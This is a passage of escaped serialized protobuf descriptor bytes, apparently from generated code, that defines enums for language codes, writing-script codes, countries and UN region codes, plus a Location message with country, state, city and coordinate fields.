\x12\x06\n\x02\x64\x61\x10!\x12\x06\n\x02\x64\x65\x10\"\x12\x06\n\x02\x64v\x10#\x12\x06\n\x02\x64z\x10$\x12\x06\n\x02\x65\x65\x10%\x12\x06\n\x02\x65l\x10&\x12\x06\n\x02\x65o\x10\'\x12\x06\n\x02\x65s\x10(\x12\x06\n\x02\x65t\x10)\x12\x06\n\x02\x65u\x10*\x12\x06\n\x02\x66\x61\x10+\x12\x06\n\x02\x66\x66\x10,\x12\x06\n\x02\x66i\x10-\x12\x06\n\x02\x66j\x10.\x12\x06\n\x02\x66o\x10/\x12\x06\n\x02\x66r\x10\x30\x12\x06\n\x02\x66y\x10\x31\x12\x06\n\x02ga\x10\x32\x12\x06\n\x02gd\x10\x33\x12\x06\n\x02gl\x10\x34\x12\x06\n\x02gn\x10\x35\x12\x06\n\x02gu\x10\x36\x12\x06\n\x02gv\x10\x37\x12\x06\n\x02ha\x10\x38\x12\x06\n\x02he\x10\x39\x12\x06\n\x02hi\x10:\x12\x06\n\x02ho\x10;\x12\x06\n\x02hr\x10<\x12\x06\n\x02ht\x10=\x12\x06\n\x02hu\x10>\x12\x06\n\x02hy\x10?\x12\x06\n\x02hz\x10@\x12\x06\n\x02ia\x10\x41\x12\x06\n\x02id\x10\x42\x12\x06\n\x02ie\x10\x43\x12\x06\n\x02ig\x10\x44\x12\x06\n\x02ii\x10\x45\x12\x06\n\x02ik\x10\x46\x12\x06\n\x02io\x10G\x12\x06\n\x02is\x10H\x12\x06\n\x02it\x10I\x12\x06\n\x02iu\x10J\x12\x06\n\x02ja\x10K\x12\x06\n\x02jv\x10L\x12\x06\n\x02ka\x10M\x12\x06\n\x02kg\x10N\x12\x06\n\x02ki\x10O\x12\x06\n\x02kj\x10P\x12\x06\n\x02kk\x10Q\x12\x06\n\x02kl\x10R\x12\x06\n\x02km\x10S\x12\x06\n\x02kn\x10T\x12\x06\n\x02ko\x10U\x12\x06\n\x02kr\x10V\x12\x06\n\x02ks\x10W\x12\x06\n\x02ku\x10X\x12\x06\n\x02kv\x10Y\x12\x06\n\x02kw\x10Z\x12\x06\n\x02ky\x10[\x12\x06\n\x02la\x10\\\x12\x06\n\x02lb\x10]\x12\x06\n\x02lg\x10^\x12\x06\n\x02li\x10_\x12\x06\n\x02ln\x10`\x12\x06\n\x02lo\x10\x61\x12\x06\n\x02lt\x10\x62\x12\x06\n\x02lu\x10\x63\x12\x06\n\x02lv\x10\x64\x12\x06\n\x02mg\x10\x65\x12\x06\n\x02mh\x10\x66\x12\x06\n\x02mi\x10g\x12\x06\n\x02mk\x10h\x12\x06\n\x02ml\x10i\x12\x06\n\x02mn\x10j\x12\x06\n\x02mr\x10k\x12\x06\n\x02ms\x10l\x12\x06\n\x02mt\x10m\x12\x06\n\x02my\x10n\x12\x06\n\x02na\x10o\x12\x06\n\x02nb\x10p\x12\x06\n\x02nd\x10q\x12\x06\n\x02ne\x10r\x12\x06\n\x02ng\x10s\x12\x06\n\x02nl\x10t\x12\x06\n\x02nn\x10u\x12\x06\n\x02no\x10v\x12\x06\n\x02nr\x10w\x12\x06\n\x02nv\x10x\x12\x06\n\x02ny\x10y\x12\x06\n\x02oc\x10z\x12\x06\n\x02oj\x10{\x12\x06\n\x02om\x10|\x12\x06\n\x02or\x10}\x12\x06\n\x02os\x10~\x12\x06\n\x02pa\x10\x7f\x12\x07\n\x02pi\x10\x80\x01\x12\x07\n\x02pl\x10\x81\x01\x12\x07\n\x02ps\x10\x82\x01\x12\x07\n\x02pt\x10\x83\x01\x12\x07\n\x02qu\x10\x84\x01\x12\x07\n\x02rm\x10\x85\x01\x12\x07\n\x02rn\x10\x86\x01\x12\x07\n\x02ro\x10\x87\x01\x12\x07\n\x02ru\x10\x88\x01\x12\x07\n\x02rw\x10\x89\x01\x12\x07\n\x02sa\x10\x8a\x01\x12\x07\n\x02sc\x10\x8b\x01\x12\x07\n\x02sd\x10\x8c\x01\x12\x07\n\x02se\x10\x8d\x01\x12\x07\n\x02sg\x10\x8e\x01\x12\x07\n\x02si\x10\x8f\x01\x12\x07\n\x02sk\x10\x90\x01\x12\x07\n\x02sl\x10\x91\x01\x12\x07\n\x02sm\x10\x92\x01\x12\x07\n\x02sn\x10\x93\x01\x12\x07\n\x02so\x10\x94\x01\x12\x07\n\x02sq\x10\x95\x01\x12\x07\n\x02sr\x10\x96\x01\x12\x07\n\x02ss\x10\x97\x01\x12\x07\n\x02st\x10\x98\x01\x12\x07\n\x02su\x10\x99\x01\x12\x07\n\x02sv\x10\x9a\x01\x12\x07\n\x02sw\x10\x9b\x01\x12\x07\n\x02ta\x10\x9c\x01\x12\x07\n\x02te\x10\x9d\x01\x12\x07\n\x02tg\x10\x9e\x01\x12\x07\n\x02th\x10\x9f\x01\x12\x07\n\x02ti\x10\xa0\x01\x12\x07\n\x02tk\x10\xa1\x01\x12\x07\n\x02tl\x10\xa2\x01\x12\x07\n\x02tn\x10\xa3\x01\x12\x07\n\x02to\x10\xa4\x01\x12\x07\n\x02tr\x10\xa5\x01\x12\x07\n\x02ts\x10\xa6\x01\x12\x07\n\x02tt\x10\xa7\x01\x12\x07\n\x02tw\x10\xa8\x01\x12\x07\n\x02ty\x10\xa9\x01\x12\x07\n\x02ug\x10\xaa\x01\x12\x07\n\x02uk\x10\xab\x01\x12\x07\n\x02ur\x10\xac\x01\x12\x07\n\x02uz\x10\xad\x01\x12\x07\n\x02ve\x10\xae\x01\x12\x07\n\x02vi\x10\xaf\x01\x12\x07\n\x02vo\x10\xb0\x01\x12\x07\n\x02wa\x10\xb1\x01\x12\x07\n\x02wo\x10\xb2\x01\x12\x07\n\x02xh\x10\xb3\x01\x12\x07\n\x02yi\x10\xb4\x01\x12\x07\n\x02yo\x10\xb5\x01\x12\x07\n\x02za\x10\xb6\x01\x12\x07\n\x02zh\x10\xb7\x01\x12\x07\n\x02zu\x10\xb8\x01\"\xaa\x10\n\x06Script\x12\x12\n\x0eUNKNOWN_SCRIPT\x10\x00\x12\x08\n\x04\x41\x64lm\x10\x01\x12\x08\n\x04\x41\x66\x61k\x10\x02\x12\x08\n\x04\x41ghb\x10\x03\x12\x08\n\x04\x41hom\x10\x04\x12\x08\n\x04\x41rab\x10\x05\x12\x08\n\x04\x41ran\x10\x06\x12\x08\n\x04\x41rmi\x10\x07\x12\x08\n\x04\x41rmn\x10\x08\x12\x08\n\x04\x41vst\x10\t\x12\x08\n\x04\x42\x61li\x10\n\x12\x08\n\x04\x42\x61mu\x10\x0b\x12\x08\n\x04\x42\x61ss\x10\x0c\x12\x08\n\x04\x42\x61tk\x10\r\x12\x08\n\x04\x42\x65ng\x10\x0e\x12\x08\n\x04\x42hks\x10\x0f\x12\x08\n\x04\x42lis\x10\x10\x12\x08\n\x04\x42opo\x10\x11\x12\x08\n\x04\x42rah\x10\x12\x12\x08\n\x04\x42rai\x10\x13\x12\x08\n\x04\x42ugi\x10\x14\x12\x08\n\x04\x42uhd\x10\x15\x12\x08\n\x04\x43\x61km\x10\x16\x12\x08\n\x04\x43\x61ns\x10\x17\x12\x08\n\x04\x43\x61ri\x10\x18\x12\x08\n\x04\x43ham\x10\x19\x12\x08\n\x04\x43her\x10\x1a\x12\x08\n\x04\x43irt\x10\x1b\x12\x08\n\x04\x43opt\x10\x1c\x12\x08\n\x04\x43pmn\x10\x1d\x12\x08\n\x04\x43prt\x10\x1e\x12\x08\n\x04\x43yrl\x10\x1f\x12\x08\n\x04\x43yrs\x10 \x12\x08\n\x04\x44\x65va\x10!\x12\x08\n\x04\x44ogr\x10\"\x12\x08\n\x04\x44srt\x10#\x12\x08\n\x04\x44upl\x10$\x12\x08\n\x04\x45gyd\x10%\x12\x08\n\x04\x45gyh\x10&\x12\x08\n\x04\x45gyp\x10\'\x12\x08\n\x04\x45lba\x10(\x12\x08\n\x04\x45lym\x10)\x12\x08\n\x04\x45thi\x10*\x12\x08\n\x04Geok\x10+\x12\x08\n\x04Geor\x10,\x12\x08\n\x04Glag\x10-\x12\x08\n\x04Gong\x10.\x12\x08\n\x04Gonm\x10/\x12\x08\n\x04Goth\x10\x30\x12\x08\n\x04Gran\x10\x31\x12\x08\n\x04Grek\x10\x32\x12\x08\n\x04Gujr\x10\x33\x12\x08\n\x04Guru\x10\x34\x12\x08\n\x04Hanb\x10\x35\x12\x08\n\x04Hang\x10\x36\x12\x08\n\x04Hani\x10\x37\x12\x08\n\x04Hano\x10\x38\x12\x08\n\x04Hans\x10\x39\x12\x08\n\x04Hant\x10:\x12\x08\n\x04Hatr\x10;\x12\x08\n\x04Hebr\x10<\x12\x08\n\x04Hira\x10=\x12\x08\n\x04Hluw\x10>\x12\x08\n\x04Hmng\x10?\x12\x08\n\x04Hmnp\x10@\x12\x08\n\x04Hrkt\x10\x41\x12\x08\n\x04Hung\x10\x42\x12\x08\n\x04Inds\x10\x43\x12\x08\n\x04Ital\x10\x44\x12\x08\n\x04Jamo\x10\x45\x12\x08\n\x04Java\x10\x46\x12\x08\n\x04Jpan\x10G\x12\x08\n\x04Jurc\x10H\x12\x08\n\x04Kali\x10I\x12\x08\n\x04Kana\x10J\x12\x08\n\x04Khar\x10K\x12\x08\n\x04Khmr\x10L\x12\x08\n\x04Khoj\x10M\x12\x08\n\x04Kitl\x10N\x12\x08\n\x04Kits\x10O\x12\x08\n\x04Knda\x10P\x12\x08\n\x04Kore\x10Q\x12\x08\n\x04Kpel\x10R\x12\x08\n\x04Kthi\x10S\x12\x08\n\x04Lana\x10T\x12\x08\n\x04Laoo\x10U\x12\x08\n\x04Latf\x10V\x12\x08\n\x04Latg\x10W\x12\x08\n\x04Latn\x10X\x12\x08\n\x04Leke\x10Y\x12\x08\n\x04Lepc\x10Z\x12\x08\n\x04Limb\x10[\x12\x08\n\x04Lina\x10\\\x12\x08\n\x04Linb\x10]\x12\x08\n\x04Lisu\x10^\x12\x08\n\x04Loma\x10_\x12\x08\n\x04Lyci\x10`\x12\x08\n\x04Lydi\x10\x61\x12\x08\n\x04Mahj\x10\x62\x12\x08\n\x04Maka\x10\x63\x12\x08\n\x04Mand\x10\x64\x12\x08\n\x04Mani\x10\x65\x12\x08\n\x04Marc\x10\x66\x12\x08\n\x04Maya\x10g\x12\x08\n\x04Medf\x10h\x12\x08\n\x04Mend\x10i\x12\x08\n\x04Merc\x10j\x12\x08\n\x04Mero\x10k\x12\x08\n\x04Mlym\x10l\x12\x08\n\x04Modi\x10m\x12\x08\n\x04Mong\x10n\x12\x08\n\x04Moon\x10o\x12\x08\n\x04Mroo\x10p\x12\x08\n\x04Mtei\x10q\x12\x08\n\x04Mult\x10r\x12\x08\n\x04Mymr\x10s\x12\x08\n\x04Nand\x10t\x12\x08\n\x04Narb\x10u\x12\x08\n\x04Nbat\x10v\x12\x08\n\x04Newa\x10w\x12\x08\n\x04Nkdb\x10x\x12\x08\n\x04Nkgb\x10y\x12\x08\n\x04Nkoo\x10z\x12\x08\n\x04Nshu\x10{\x12\x08\n\x04Ogam\x10|\x12\x08\n\x04Olck\x10}\x12\x08\n\x04Orkh\x10~\x12\x08\n\x04Orya\x10\x7f\x12\t\n\x04Osge\x10\x80\x01\x12\t\n\x04Osma\x10\x81\x01\x12\t\n\x04Palm\x10\x82\x01\x12\t\n\x04Pauc\x10\x83\x01\x12\t\n\x04Perm\x10\x84\x01\x12\t\n\x04Phag\x10\x85\x01\x12\t\n\x04Phli\x10\x86\x01\x12\t\n\x04Phlp\x10\x87\x01\x12\t\n\x04Phlv\x10\x88\x01\x12\t\n\x04Phnx\x10\x89\x01\x12\t\n\x04Plrd\x10\x8a\x01\x12\t\n\x04Piqd\x10\x8b\x01\x12\t\n\x04Prti\x10\x8c\x01\x12\t\n\x04Qaaa\x10\x8d\x01\x12\t\n\x04Qabx\x10\x8e\x01\x12\t\n\x04Rjng\x10\x8f\x01\x12\t\n\x04Rohg\x10\x90\x01\x12\t\n\x04Roro\x10\x91\x01\x12\t\n\x04Runr\x10\x92\x01\x12\t\n\x04Samr\x10\x93\x01\x12\t\n\x04Sara\x10\x94\x01\x12\t\n\x04Sarb\x10\x95\x01\x12\t\n\x04Saur\x10\x96\x01\x12\t\n\x04Sgnw\x10\x97\x01\x12\t\n\x04Shaw\x10\x98\x01\x12\t\n\x04Shrd\x10\x99\x01\x12\t\n\x04Shui\x10\x9a\x01\x12\t\n\x04Sidd\x10\x9b\x01\x12\t\n\x04Sind\x10\x9c\x01\x12\t\n\x04Sinh\x10\x9d\x01\x12\t\n\x04Sogd\x10\x9e\x01\x12\t\n\x04Sogo\x10\x9f\x01\x12\t\n\x04Sora\x10\xa0\x01\x12\t\n\x04Soyo\x10\xa1\x01\x12\t\n\x04Sund\x10\xa2\x01\x12\t\n\x04Sylo\x10\xa3\x01\x12\t\n\x04Syrc\x10\xa4\x01\x12\t\n\x04Syre\x10\xa5\x01\x12\t\n\x04Syrj\x10\xa6\x01\x12\t\n\x04Syrn\x10\xa7\x01\x12\t\n\x04Tagb\x10\xa8\x01\x12\t\n\x04Takr\x10\xa9\x01\x12\t\n\x04Tale\x10\xaa\x01\x12\t\n\x04Talu\x10\xab\x01\x12\t\n\x04Taml\x10\xac\x01\x12\t\n\x04Tang\x10\xad\x01\x12\t\n\x04Tavt\x10\xae\x01\x12\t\n\x04Telu\x10\xaf\x01\x12\t\n\x04Teng\x10\xb0\x01\x12\t\n\x04Tfng\x10\xb1\x01\x12\t\n\x04Tglg\x10\xb2\x01\x12\t\n\x04Thaa\x10\xb3\x01\x12\t\n\x04Thai\x10\xb4\x01\x12\t\n\x04Tibt\x10\xb5\x01\x12\t\n\x04Tirh\x10\xb6\x01\x12\t\n\x04Ugar\x10\xb7\x01\x12\t\n\x04Vaii\x10\xb8\x01\x12\t\n\x04Visp\x10\xb9\x01\x12\t\n\x04Wara\x10\xba\x01\x12\t\n\x04Wcho\x10\xbb\x01\x12\t\n\x04Wole\x10\xbc\x01\x12\t\n\x04Xpeo\x10\xbd\x01\x12\t\n\x04Xsux\x10\xbe\x01\x12\t\n\x04Yiii\x10\xbf\x01\x12\t\n\x04Zanb\x10\xc0\x01\x12\t\n\x04Zinh\x10\xc1\x01\x12\t\n\x04Zmth\x10\xc2\x01\x12\t\n\x04Zsye\x10\xc3\x01\x12\t\n\x04Zsym\x10\xc4\x01\x12\t\n\x04Zxxx\x10\xc5\x01\x12\t\n\x04Zyyy\x10\xc6\x01\x12\t\n\x04Zzzz\x10\xc7\x01\"\xec)\n\x08Location\x12%\n\x07\x63ountry\x18\x01 \x01(\x0e\x32\x14.pb.Location.Country\x12\r\n\x05state\x18\x02 \x01(\t\x12\x0c\n\x04\x63ity\x18\x03 \x01(\t\x12\x0c\n\x04\x63ode\x18\x04 \x01(\t\x12\x10\n\x08latitude\x18\x05 \x01(\x11\x12\x11\n\tlongitude\x18\x06 \x01(\x11\"\xe8(\n\x07\x43ountry\x12\x13\n\x0fUNKNOWN_COUNTRY\x10\x00\x12\x06\n\x02\x41\x46\x10\x01\x12\x06\n\x02\x41X\x10\x02\x12\x06\n\x02\x41L\x10\x03\x12\x06\n\x02\x44Z\x10\x04\x12\x06\n\x02\x41S\x10\x05\x12\x06\n\x02\x41\x44\x10\x06\x12\x06\n\x02\x41O\x10\x07\x12\x06\n\x02\x41I\x10\x08\x12\x06\n\x02\x41Q\x10\t\x12\x06\n\x02\x41G\x10\n\x12\x06\n\x02\x41R\x10\x0b\x12\x06\n\x02\x41M\x10\x0c\x12\x06\n\x02\x41W\x10\r\x12\x06\n\x02\x41U\x10\x0e\x12\x06\n\x02\x41T\x10\x0f\x12\x06\n\x02\x41Z\x10\x10\x12\x06\n\x02\x42S\x10\x11\x12\x06\n\x02\x42H\x10\x12\x12\x06\n\x02\x42\x44\x10\x13\x12\x06\n\x02\x42\x42\x10\x14\x12\x06\n\x02\x42Y\x10\x15\x12\x06\n\x02\x42\x45\x10\x16\x12\x06\n\x02\x42Z\x10\x17\x12\x06\n\x02\x42J\x10\x18\x12\x06\n\x02\x42M\x10\x19\x12\x06\n\x02\x42T\x10\x1a\x12\x06\n\x02\x42O\x10\x1b\x12\x06\n\x02\x42Q\x10\x1c\x12\x06\n\x02\x42\x41\x10\x1d\x12\x06\n\x02\x42W\x10\x1e\x12\x06\n\x02\x42V\x10\x1f\x12\x06\n\x02\x42R\x10 \x12\x06\n\x02IO\x10!\x12\x06\n\x02\x42N\x10\"\x12\x06\n\x02\x42G\x10#\x12\x06\n\x02\x42\x46\x10$\x12\x06\n\x02\x42I\x10%\x12\x06\n\x02KH\x10&\x12\x06\n\x02\x43M\x10\'\x12\x06\n\x02\x43\x41\x10(\x12\x06\n\x02\x43V\x10)\x12\x06\n\x02KY\x10*\x12\x06\n\x02\x43\x46\x10+\x12\x06\n\x02TD\x10,\x12\x06\n\x02\x43L\x10-\x12\x06\n\x02\x43N\x10.\x12\x06\n\x02\x43X\x10/\x12\x06\n\x02\x43\x43\x10\x30\x12\x06\n\x02\x43O\x10\x31\x12\x06\n\x02KM\x10\x32\x12\x06\n\x02\x43G\x10\x33\x12\x06\n\x02\x43\x44\x10\x34\x12\x06\n\x02\x43K\x10\x35\x12\x06\n\x02\x43R\x10\x36\x12\x06\n\x02\x43I\x10\x37\x12\x06\n\x02HR\x10\x38\x12\x06\n\x02\x43U\x10\x39\x12\x06\n\x02\x43W\x10:\x12\x06\n\x02\x43Y\x10;\x12\x06\n\x02\x43Z\x10<\x12\x06\n\x02\x44K\x10=\x12\x06\n\x02\x44J\x10>\x12\x06\n\x02\x44M\x10?\x12\x06\n\x02\x44O\x10@\x12\x06\n\x02\x45\x43\x10\x41\x12\x06\n\x02\x45G\x10\x42\x12\x06\n\x02SV\x10\x43\x12\x06\n\x02GQ\x10\x44\x12\x06\n\x02\x45R\x10\x45\x12\x06\n\x02\x45\x45\x10\x46\x12\x06\n\x02\x45T\x10G\x12\x06\n\x02\x46K\x10H\x12\x06\n\x02\x46O\x10I\x12\x06\n\x02\x46J\x10J\x12\x06\n\x02\x46I\x10K\x12\x06\n\x02\x46R\x10L\x12\x06\n\x02GF\x10M\x12\x06\n\x02PF\x10N\x12\x06\n\x02TF\x10O\x12\x06\n\x02GA\x10P\x12\x06\n\x02GM\x10Q\x12\x06\n\x02GE\x10R\x12\x06\n\x02\x44\x45\x10S\x12\x06\n\x02GH\x10T\x12\x06\n\x02GI\x10U\x12\x06\n\x02GR\x10V\x12\x06\n\x02GL\x10W\x12\x06\n\x02GD\x10X\x12\x06\n\x02GP\x10Y\x12\x06\n\x02GU\x10Z\x12\x06\n\x02GT\x10[\x12\x06\n\x02GG\x10\\\x12\x06\n\x02GN\x10]\x12\x06\n\x02GW\x10^\x12\x06\n\x02GY\x10_\x12\x06\n\x02HT\x10`\x12\x06\n\x02HM\x10\x61\x12\x06\n\x02VA\x10\x62\x12\x06\n\x02HN\x10\x63\x12\x06\n\x02HK\x10\x64\x12\x06\n\x02HU\x10\x65\x12\x06\n\x02IS\x10\x66\x12\x06\n\x02IN\x10g\x12\x06\n\x02ID\x10h\x12\x06\n\x02IR\x10i\x12\x06\n\x02IQ\x10j\x12\x06\n\x02IE\x10k\x12\x06\n\x02IM\x10l\x12\x06\n\x02IL\x10m\x12\x06\n\x02IT\x10n\x12\x06\n\x02JM\x10o\x12\x06\n\x02JP\x10p\x12\x06\n\x02JE\x10q\x12\x06\n\x02JO\x10r\x12\x06\n\x02KZ\x10s\x12\x06\n\x02KE\x10t\x12\x06\n\x02KI\x10u\x12\x06\n\x02KP\x10v\x12\x06\n\x02KR\x10w\x12\x06\n\x02KW\x10x\x12\x06\n\x02KG\x10y\x12\x06\n\x02LA\x10z\x12\x06\n\x02LV\x10{\x12\x06\n\x02LB\x10|\x12\x06\n\x02LS\x10}\x12\x06\n\x02LR\x10~\x12\x06\n\x02LY\x10\x7f\x12\x07\n\x02LI\x10\x80\x01\x12\x07\n\x02LT\x10\x81\x01\x12\x07\n\x02LU\x10\x82\x01\x12\x07\n\x02MO\x10\x83\x01\x12\x07\n\x02MK\x10\x84\x01\x12\x07\n\x02MG\x10\x85\x01\x12\x07\n\x02MW\x10\x86\x01\x12\x07\n\x02MY\x10\x87\x01\x12\x07\n\x02MV\x10\x88\x01\x12\x07\n\x02ML\x10\x89\x01\x12\x07\n\x02MT\x10\x8a\x01\x12\x07\n\x02MH\x10\x8b\x01\x12\x07\n\x02MQ\x10\x8c\x01\x12\x07\n\x02MR\x10\x8d\x01\x12\x07\n\x02MU\x10\x8e\x01\x12\x07\n\x02YT\x10\x8f\x01\x12\x07\n\x02MX\x10\x90\x01\x12\x07\n\x02\x46M\x10\x91\x01\x12\x07\n\x02MD\x10\x92\x01\x12\x07\n\x02MC\x10\x93\x01\x12\x07\n\x02MN\x10\x94\x01\x12\x07\n\x02ME\x10\x95\x01\x12\x07\n\x02MS\x10\x96\x01\x12\x07\n\x02MA\x10\x97\x01\x12\x07\n\x02MZ\x10\x98\x01\x12\x07\n\x02MM\x10\x99\x01\x12\x07\n\x02NA\x10\x9a\x01\x12\x07\n\x02NR\x10\x9b\x01\x12\x07\n\x02NP\x10\x9c\x01\x12\x07\n\x02NL\x10\x9d\x01\x12\x07\n\x02NC\x10\x9e\x01\x12\x07\n\x02NZ\x10\x9f\x01\x12\x07\n\x02NI\x10\xa0\x01\x12\x07\n\x02NE\x10\xa1\x01\x12\x07\n\x02NG\x10\xa2\x01\x12\x07\n\x02NU\x10\xa3\x01\x12\x07\n\x02NF\x10\xa4\x01\x12\x07\n\x02MP\x10\xa5\x01\x12\x07\n\x02NO\x10\xa6\x01\x12\x07\n\x02OM\x10\xa7\x01\x12\x07\n\x02PK\x10\xa8\x01\x12\x07\n\x02PW\x10\xa9\x01\x12\x07\n\x02PS\x10\xaa\x01\x12\x07\n\x02PA\x10\xab\x01\x12\x07\n\x02PG\x10\xac\x01\x12\x07\n\x02PY\x10\xad\x01\x12\x07\n\x02PE\x10\xae\x01\x12\x07\n\x02PH\x10\xaf\x01\x12\x07\n\x02PN\x10\xb0\x01\x12\x07\n\x02PL\x10\xb1\x01\x12\x07\n\x02PT\x10\xb2\x01\x12\x07\n\x02PR\x10\xb3\x01\x12\x07\n\x02QA\x10\xb4\x01\x12\x07\n\x02RE\x10\xb5\x01\x12\x07\n\x02RO\x10\xb6\x01\x12\x07\n\x02RU\x10\xb7\x01\x12\x07\n\x02RW\x10\xb8\x01\x12\x07\n\x02\x42L\x10\xb9\x01\x12\x07\n\x02SH\x10\xba\x01\x12\x07\n\x02KN\x10\xbb\x01\x12\x07\n\x02LC\x10\xbc\x01\x12\x07\n\x02MF\x10\xbd\x01\x12\x07\n\x02PM\x10\xbe\x01\x12\x07\n\x02VC\x10\xbf\x01\x12\x07\n\x02WS\x10\xc0\x01\x12\x07\n\x02SM\x10\xc1\x01\x12\x07\n\x02ST\x10\xc2\x01\x12\x07\n\x02SA\x10\xc3\x01\x12\x07\n\x02SN\x10\xc4\x01\x12\x07\n\x02RS\x10\xc5\x01\x12\x07\n\x02SC\x10\xc6\x01\x12\x07\n\x02SL\x10\xc7\x01\x12\x07\n\x02SG\x10\xc8\x01\x12\x07\n\x02SX\x10\xc9\x01\x12\x07\n\x02SK\x10\xca\x01\x12\x07\n\x02SI\x10\xcb\x01\x12\x07\n\x02SB\x10\xcc\x01\x12\x07\n\x02SO\x10\xcd\x01\x12\x07\n\x02ZA\x10\xce\x01\x12\x07\n\x02GS\x10\xcf\x01\x12\x07\n\x02SS\x10\xd0\x01\x12\x07\n\x02\x45S\x10\xd1\x01\x12\x07\n\x02LK\x10\xd2\x01\x12\x07\n\x02SD\x10\xd3\x01\x12\x07\n\x02SR\x10\xd4\x01\x12\x07\n\x02SJ\x10\xd5\x01\x12\x07\n\x02SZ\x10\xd6\x01\x12\x07\n\x02SE\x10\xd7\x01\x12\x07\n\x02\x43H\x10\xd8\x01\x12\x07\n\x02SY\x10\xd9\x01\x12\x07\n\x02TW\x10\xda\x01\x12\x07\n\x02TJ\x10\xdb\x01\x12\x07\n\x02TZ\x10\xdc\x01\x12\x07\n\x02TH\x10\xdd\x01\x12\x07\n\x02TL\x10\xde\x01\x12\x07\n\x02TG\x10\xdf\x01\x12\x07\n\x02TK\x10\xe0\x01\x12\x07\n\x02TO\x10\xe1\x01\x12\x07\n\x02TT\x10\xe2\x01\x12\x07\n\x02TN\x10\xe3\x01\x12\x07\n\x02TR\x10\xe4\x01\x12\x07\n\x02TM\x10\xe5\x01\x12\x07\n\x02TC\x10\xe6\x01\x12\x07\n\x02TV\x10\xe7\x01\x12\x07\n\x02UG\x10\xe8\x01\x12\x07\n\x02UA\x10\xe9\x01\x12\x07\n\x02\x41\x45\x10\xea\x01\x12\x07\n\x02GB\x10\xeb\x01\x12\x07\n\x02US\x10\xec\x01\x12\x07\n\x02UM\x10\xed\x01\x12\x07\n\x02UY\x10\xee\x01\x12\x07\n\x02UZ\x10\xef\x01\x12\x07\n\x02VU\x10\xf0\x01\x12\x07\n\x02VE\x10\xf1\x01\x12\x07\n\x02VN\x10\xf2\x01\x12\x07\n\x02VG\x10\xf3\x01\x12\x07\n\x02VI\x10\xf4\x01\x12\x07\n\x02WF\x10\xf5\x01\x12\x07\n\x02\x45H\x10\xf6\x01\x12\x07\n\x02YE\x10\xf7\x01\x12\x07\n\x02ZM\x10\xf8\x01\x12\x07\n\x02ZW\x10\xf9\x01\x12\t\n\x04R001\x10\xfa\x01\x12\t\n\x04R002\x10\xfb\x01\x12\t\n\x04R015\x10\xfc\x01\x12\t\n\x04R012\x10\xfd\x01\x12\t\n\x04R818\x10\xfe\x01\x12\t\n\x04R434\x10\xff\x01\x12\t\n\x04R504\x10\x80\x02\x12\t\n\x04R729\x10\x81\x02\x12\t\n\x04R788\x10\x82\x02\x12\t\n\x04R732\x10\x83\x02\x12\t\n\x04R202\x10\x84\x02\x12\t\n\x04R014\x10\x85\x02\x12\t\n\x04R086\x10\x86\x02\x12\t\n\x04R108\x10\x87\x02\x12\t\n\x04R174\x10\x88\x02\x12\t\n\x04R262\x10\x89\x02\x12\t\n\x04R232\x10\x8a\x02\x12\t\n\x04R231\x10\x8b\x02\x12\t\n\x04R260\x10\x8c\x02\x12\t\n\x04R404\x10\x8d\x02\x12\t\n\x04R450\x10\x8e\x02\x12\t\n\x04R454\x10\x8f\x02\x12\t\n\x04R480\x10\x90\x02\x12\t\n\x04R175\x10\x91\x02\x12\t\n\x04R508\x10\x92\x02\x12\t\n\x04R638\x10\x93\x02\x12\t\n\x04R646\x10\x94\x02\x12\t\n\x04R690\x10\x95\x02\x12\t\n\x04R706\x10\x96\x02\x12\t\n\x04R728\x10\x97\x02\x12\t\n\x04R800\x10\x98\x02\x12\t\n\x04R834\x10\x99\x02\x12\t\n\x04R894\x10\x9a\x02\x12\t\n\x04R716\x10\x9b\x02\x12\t\n\x04R017\x10\x9c\x02\x12\t\n\x04R024\x10\x9d\x02\x12\t\n\x04R120\x10\x9e\x02\x12\t\n\x04R140\x10\x9f\x02\x12\t\n\x04R148\x10\xa0\x02\x12\t\n\x04R178\x10\xa1\x02\x12\t\n\x04R180\x10\xa2\x02\x12\t\n\x04R226\x10\xa3\x02\x12\t\n\x04R266\x10\xa4\x02\x12\t\n\x04R678\x10\xa5\x02\x12\t\n\x04R018\x10\xa6\x02\x12\t\n\x04R072\x10\xa7\x02\x12\t\n\x04R748\x10\xa8\x02\x12\t\n\x04R426\x10\xa9\x02\x12\t\n\x04R516\x10\xaa\x02\x12\t\n\x04R710\x10\xab\x02\x12\t\n\x04R011\x10\xac\x02\x12\t\n\x04R204\x10\xad\x02\x12\t\n\x04R854\x10\xae\x02\x12\t\n\x04R132\x10\xaf\x02\x12\t\n\x04R384\x10\xb0\x02\x12\t\n\x04R270\x10\xb1\x02\x12\t\n\x04R288\x10\xb2\x02\x12\t\n\x04R324\x10\xb3\x02\x12\t\n\x04R624\x10\xb4\x02\x12\t\n\x04R430\x10\xb5\x02\x12\t\n\x04R466\x10\xb6\x02\x12\t\n\x04R478\x10\xb7\x02\x12\t\n\x04R562\x10\xb8\x02\x12\t\n\x04R566\x10\xb9\x02\x12\t\n\x04R654\x10\xba\x02\x12\t\n\x04R686\x10\xbb\x02\x12\t\n\x04R694\x10\xbc\x02\x12\t\n\x04R768\x10\xbd\x02\x12\t\n\x04R019\x10\xbe\x02\x12\t\n\x04R419\x10\xbf\x02\x12\t\n\x04R029\x10\xc0\x02\x12\t\n\x04R660\x10\xc1\x02\x12\t\n\x04R028\x10\xc2\x02\x12\t\n\x04R533\x10\xc3\x02\x12\t\n\x04R044\x10\xc4\x02\x12\t\n\x04R052\x10\xc5\x02\x12\t\n\x04R535\x10\xc6\x02\x12\t\n\x04R092\x10\xc7\x02\x12\t\n\x04R136\x10\xc8\x02\x12\t\n\x04R192\x10\xc9\x02\x12\t\n\x04R531\x10\xca\x02\x12\t\n\x04R212\x10\xcb\x02\x12\t\n\x04R214\x10\xcc\x02\x12\t\n\x04R308\x10\xcd\x02\x12\t\n\x04R312\x10\xce\x02\x12\t\n\x04R332\x10\xcf\x02\x12\t\n\x04R388\x10\xd0\x02\x12\t\n\x04R474\x10\xd1\x02\x12\t\n\x04R500\x10\xd2\x02\x12\t\n\x04R630\x10\xd3\x02\x12\t\n\x04R652\x10\xd4\x02\x12\t\n\x04R659\x10\xd5\x02\x12\t\n\x04R662\x10\xd6\x02\x12\t\n\x04R663\x10\xd7\x02\x12\t\n\x04R670\x10\xd8\x02\x12\t\n\x04R534\x10\xd9\x02\x12\t\n\x04R780\x10\xda\x02\x12\t\n\x04R796\x10\xdb\x02\x12\t\n\x04R850\x10\xdc\x02\x12\t\n\x04R013\x10\xdd\x02\x12\t\n\x04R084\x10\xde\x02\x12\t\n\x04R188\x10\xdf\x02\x12\t\